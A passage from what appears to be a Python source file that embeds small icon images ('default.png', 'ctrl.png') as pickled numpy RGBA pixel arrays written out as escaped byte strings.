\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00'\np13\ntp14\nb.",
'default.png': 'cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS\'b\'\np3\ntp4\nRp5\n(I1\n(I16\nI16\nI4\ntp6\ncnumpy\ndtype\np7\n(S\'u1\'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS\'|\'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS\'\\x00\\x7f\\xa6\\x1b\\x0c\\x8a\\xad\\xdc\\r\\x91\\xb0\\xf3\\r\\x91\\xb0\\xf3\\r\\x91\\xb0\\xf4\\r\\x91\\xb1\\xf4\\r\\x90\\xb0\\xf4\\x05\\x85\\xa9\\xef\\x00\\x7f\\xa6<\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6!\\x1d\\x9c\\xb9\\xf5g\\xd9\\xf1\\xffi\\xd9\\xf3\\xffd\\xd1\\xee\\xff]\\xcb\\xeb\\xff@\\xbb\\xe3\\xff\\x16\\x9c\\xc2\\xf8\\x00\\x7f\\xa6\\xb4\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6U\\\'\\xac\\xc5\\xf9i\\xd9\\xf3\\xffc\\xd3\\xef\\xff\\\\\\xcf\\xeb\\xffP\\xc8\\xe6\\xff\\x17\\x9f\\xc4\\xfd\\x00\\x7f\\xa6\\xfc\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x02\\x83\\xa8lH\\xc5\\xdd\\xfah\\xdc\\xf3\\xffc\\xd4\\xef\\xffV\\xce\\xe9\\xffN\\xcf\\xe7\\xff&\\xaa\\xca\\xfd\\x00\\x7f\\xa6\\xff\\x03\\x81\\xc7\\x01\\x04\\x8d\\xda\\x01\\t\\x94\\xd9\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6"$\\xa9\\xc4\\xf7g\\xdf\\xf5\\xfff\\xdb\\xf3\\xffU\\xcd\\xeb\\xff\\x16\\xb3\\xda\\xff.\\xc9\\xe1\\xff(\\xb2\\xd0\\xfe\\x01\\x7f\\xa6\\xff\\x04\\x84\\xc9\\x05\\t\\x94\\xd9\\x06\\x10\\x9c\\xd7\\x01\\x16\\xa2\\xd6\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x02\\x83\\xa9\\x81T\\xd3\\xeb\\xffg\\xe5\\xf7\\xffe\\xda\\xf3\\xff!\\xaa\\xde\\xff\\x11\\x9d\\xc3\\xfe\\x11\\xba\\xd7\\xff \\xb9\\xd5\\xfe\\x00\\x7f\\xa6\\xff\\x16u\\x8d\\x03\\x14\\x84\\xae\\x05\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x10\\x92\\xb4\\xc0d\\xde\\xf3\\xffg\\xe5\\xf7\\xff_\\xcc\\xef\\xff\\x0e\\x9c\\xd5\\xff\\rx\\x95\\xf6\\x0e\\x89\\xab\\xf4\\x18\\xb2\\xd1\\xfc\\x00\\x7f\\xa6\\xff\\xff\\xff\\xff\\x00\\x1a~\\x91\\x01\\x1d\\xa5\\xce\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x005\\xa9\\xc3\\xefq\\xec\\xf9\\xffg\\xe5\\xf7\\xff>\\xb7\\xe8\\xff\\x14\\x96\\xc8\\xfe\\x02}\\xa3\\xb1\\x00\\x7f\\xa6Q\\x03\\x82\\xa9\\xe8\\x00\\x7f\\xa6\\xe9\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x11\\x1c\\x98\\xb8\\x04%\\xb5\\xd3\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00D\\xad\\xc8\\xf3r\\xec\\xf9\\xffg\\xe5\\xf7\\xff:\\xb7\\xe8\\xff\\x19\\x90\\xc5\\xfe\\x03{\\xa0\\xa6\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6*\\x00\\x7f\\xa6*\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x98\\x0f\\x8f\\xb1\\x13&\\xb5\\xd3\\x04.\\xc0\\xd1\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x19\\x93\\xb7\\xc6i\\xdf\\xf4\\xffg\\xe5\\xf7\\xffT\\xc8\\xee\\xff\\x06\\x88\\xcd\\xff\\x08g\\x85\\xf7\\x00\\x7f\\xa6\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x1b\\x01\\x80\\xa7\\xeb\\x1d\\xa3\\xca\\x16#\\xb2\\xd4\\n*\\xbb\\xd2\\x04.\\xbc\\xd7\\x01\\xff\\xff\\xff\\x00\\x01\\x81\\xa7\\x88Y\\xd1\\xee\\xffg\\xe5\\xf7\\xfff\\xd9\\xf3\\xff\\\'\\xa2\\xe2\\xff\\x05e\\x99\\xf9\\x06~\\xa5\\xf3\\x01\\x81\\xa8\\x9c\\x01\\x80\\xa8\\x9f\\x04\\x85\\xad\\xef\\x08\\x8f\\xb9\\x92\\x17\\xa4\\xd6*\\x1e\\xac\\xd5\\x1a$\\xb3\\xd3\\x0c\\x19\\xa7\\xd5\\x02\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6+!\\xa3\\xc8\\xf5i\\xe0\\xf5\\xffe\\xd9\\xf3\\xff\\\\\\xca\\xee\\xff\\x1f\\x9c\\xe0\\xfa\\x03\\x84\\xca\\xd6\\x07\\x8b\\xc5\\xca\\x06\\x88\\xc1\\xb8\\x08\\x8e\\xd0l\\x0b\\x96\\xd8I\\x11\\x9e\\xd74\\x17\\xa5\\xd6 \\xab\\xd7\\x0b\\x17\\xa2\\xdc\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x01\\x80\\xa8~?\\xb9\\xe0\\xf9h\\xda\\xf3\\xff_\\xcc\\xef\\xffV\\xc1\\xec\\xfd3\\xa7\\xe3\\xe3\\x1a\\x96\\xde\\xae\\x04\\x8b\\xdb\\x89\\x00\\x89\\xdao\\x05\\x8f\\xd9T\\x0b\\x96\\xd8<\\x11\\x9b\\xd7\\x1d\\x18\\x95\\xc9\\x0c\\x00\\x80\\xd5\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x04\\x03\\x83\\xaa\\xcd5\\xa2\\xc9\\xf9[\\xc6\\xea\\xffU\\xc1\\xec\\xffH\\xb4\\xe8\\xf39\\xa8\\xe4\\xc5\\x0b\\x8f\\xdc\\x9f\\x00\\x89\\xda{\\x00\\x89\\xda_\\x07\\x87\\xc4I\\x05|\\xa5s\\x05m\\xa3\\x02\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x06\\x01\\x7f\\xa6\\x89\\x12x\\x9e\\xf63\\x88\\xae\\xfe6\\x93\\xc3\\xfe4\\x9d\\xd6\\xdf\\x08\\x82\\xc7\\xb8\\x03k\\xa2\\xab\\x04k\\x97\\xa8\\x02w\\x9e\\xeb\\x00\\x7f\\xa6j\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa67\\x00~\\xa5\\x95\\x03v\\x9c\\xd4\\x03h\\x8c\\xfa\\x02i\\x8e\\xf9\\x01x\\x9f\\xcc\\x00\\x7f\\xa6\\x92\\x00\\x7f\\xa63\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\'\np13\ntp14\nb.',
'ctrl.png': "cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I32\nI32\nI4\ntp6\ncnumpy\ndtype\np7\n(S'u1'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xad\\xad\\xad\\x19\\xa8\\xa8\\xa8\\x8d\\xa9\\xa9\\xa9\\xc1\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xaa\\xaa\\xaa\\xc2\\xa9\\xa9\\xa9\\x8e\\xad\\xad\\xad\\x19\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xa8\\xa8\\xa8X\\xa9\\xa9\\xa9\\xed\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xed\\xa8\\xa8\\xa8X\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff555\\xffPPP\\xff\\x13\\x13\\x13\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x01\\x01\\x01\\xff\\xb2\\xb2\\xb2\\xff\\xe3\\xe3\\xe3\\xff\\xd9\\xd9\\xd9\\xff]]]\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x13\\x13\\x13\\xff\\xbb\\xbb\\xbb\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xffFFF\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x13\\x13\\x13\\xff\\xbb\\xbb\\xbb\\xff\\xe3\\xe3\\xe3\\xff\\xc4\\xc4\\xc4\\xff\\x06\\x06\\x06\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff```\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff:::\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff666\\xff\\xaf\\xaf\\xaf\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9b\\x9b\\x9b\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff@@@\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffSSS\\xff\\xe3\\xe3\\xe3\\xff\\xb7\\xb7\\xb7\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x04\\x04\\x04\\xff\\xd5\\xd5\\xd5\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xffXXX\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x17\\x17\\x17\\xff\\xdb\\xdb\\xdb\\xff\\xe3\\xe3\\xe3\\xff\\xb7\\xb7\\xb7\\xff[[[\\xff\\x97\\x97\\x97\\xff\\xd4\\xd4\\xd4\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff```\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffHHH\\xff\\xc6\\xc6\\xc6\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x07\\x07\\x07\\xff;;;\\xffAAA\\xff\\\\\\\\\\\\\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\x